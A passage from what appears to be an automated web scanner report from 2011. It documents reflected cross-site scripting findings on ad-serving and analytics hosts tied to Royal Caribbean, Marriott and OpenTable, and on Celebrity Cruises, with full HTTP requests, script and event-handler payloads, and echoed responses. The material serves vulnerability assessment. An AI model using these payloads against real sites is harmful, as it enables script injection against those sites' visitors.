The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c259b"><script>alert(1)</script>3e94a41bd6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/home.doc259b"><script>alert(1)</script>3e94a41bd6e/6905219797@x95?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/home.doc259b"><script>alert(1)</script>3e94a41bd6e/204585521/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.34. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c5"><script>alert(1)</script>e2b99c27f67 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/home.do/6905219797@x95839c5"><script>alert(1)</script>e2b99c27f67?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/home.do/649712140/x95839c5"><script>alert(1)</script>e2b99c27f67/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.35. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b56e"><script>alert(1)</script>ba72abc70b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com2b56e"><script>alert(1)</script>ba72abc70b1/search/processSearch.do/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com2b56e"><script>alert(1)</script>ba72abc70b1/search/processSearch.do/1470161541/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.36. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f1a"><script>alert(1)</script>66ffec0be48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/searchd7f1a"><script>alert(1)</script>66ffec0be48/processSearch.do/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/searchd7f1a"><script>alert(1)</script>66ffec0be48/processSearch.do/1132808216/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.37. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7cfc"><script>alert(1)</script>0b79b388d6e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.dof7cfc"><script>alert(1)</script>0b79b388d6e/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.dof7cfc"><script>alert(1)</script>0b79b388d6e/786852054/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.38. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da89e"><script>alert(1)</script>5102141a7e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.do/4350521243@x95da89e"><script>alert(1)</script>5102141a7e2?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/1003494811/x95da89e"><script>alert(1)</script>5102141a7e2/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.39. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a5e"><script>alert(1)</script>5afac9b96c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com15a5e"><script>alert(1)</script>5afac9b96c6/search/processSearch.do/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com15a5e"><script>alert(1)</script>5afac9b96c6/search/processSearch.do/1690492633/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.40. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7734c"><script>alert(1)</script>d1c057d37d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search7734c"><script>alert(1)</script>d1c057d37d7/processSearch.do/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search7734c"><script>alert(1)</script>d1c057d37d7/processSearch.do/1330485593/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.41. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97702"><script>alert(1)</script>45113b79497 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.do97702"><script>alert(1)</script>45113b79497/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do97702"><script>alert(1)</script>45113b79497/792549303/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.42. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc79"><script>alert(1)</script>6e6cfac25c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.do/9110333970@x954dc79"><script>alert(1)</script>6e6cfac25c4?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 352
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/71455887/x954dc79"><script>alert(1)</script>6e6cfac25c4/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...
4.43. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1471a<img%20src%3da%20onerror%3dalert(1)>5431cfedf61 was submitted in the mbox parameter. This input was echoed as 1471a<img src=a onerror=alert(1)>5431cfedf61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event1471a<img%20src%3da%20onerror%3dalert(1)>5431cfedf61&mboxId=0&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:57:55 GMT; Path=/m2/marriottinternationa
Content-Length: 264
Date: Mon, 03 Oct 2011 12:57:55 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event1471a<img src=a onerror=alert(1)>5431cfedf61', 0).setOffer(new mboxOfferDefault()).loaded();}
4.44. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 52518<script>alert(1)</script>cbf7a1f30df was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=052518<script>alert(1)</script>cbf7a1f30df&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:01 GMT; Path=/m2/marriottinternationa
Content-Length: 261
Date: Mon, 03 Oct 2011 12:58:00 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event', 052518<script>alert(1)</script>cbf7a1f30df).setOffer(new mboxOfferDefault()).loaded();}
4.45. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload f19e2<script>alert(1)</script>0acac75cc3c was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/opentable/mbox/standard?mboxHost=www.opentable.com&mboxSession=1317646507167-573607&mboxPage=1317646507167-573607&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=x-only&mboxCount=1&mbox=mboxInterimTrackf19e2<script>alert(1)</script>0acac75cc3c&mboxId=0&mboxTime=1317628507182&mboxURL=http%3A%2F%2Fwww.opentable.com%2Finterim.aspx%3Frid%3D90%26restref%3D90%26m%3D4%26t%3Dsingle%26p%3D2%26d%3D10%2F3%2F2011%25207%3A00%2520PM%26rtype%3Dism_mod&mboxReferrer=http%3A%2F%2Fwww.grandcafe-sf.com%2F&mboxVersion=40 HTTP/1.1
Host: opentable.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646507167-573607.19; Domain=opentable.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:56:21 GMT; Path=/m2/opentable
Content-Type: text/javascript
Content-Length: 138
Date: Mon, 03 Oct 2011 12:56:21 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxInterimTrackf19e2<script>alert(1)</script>0acac75cc3c',0).setOffer(new mboxOfferDefault()).loaded();
4.46. http://www.celebritycruises.com/explore/ships/detail.do [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /explore/ships/detail.do

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962db"style%3d"x%3aexpression(alert(1))"eaff2cf540f was submitted in the tab parameter. This input was echoed as 962db"style="x:expression(alert(1))"eaff2cf540f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /explore/ships/detail.do?shipCode=SI&tab=sailings%2Fexplore%2Fships%2Fsailings.do%3Fpagename%3Dship_SI%26shipCode%3DSI962db"style%3d"x%3aexpression(alert(1))"eaff2cf540f&cS=Homepage&ICID=Cel_11Q4_web_hp_body_Silhouette_US HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
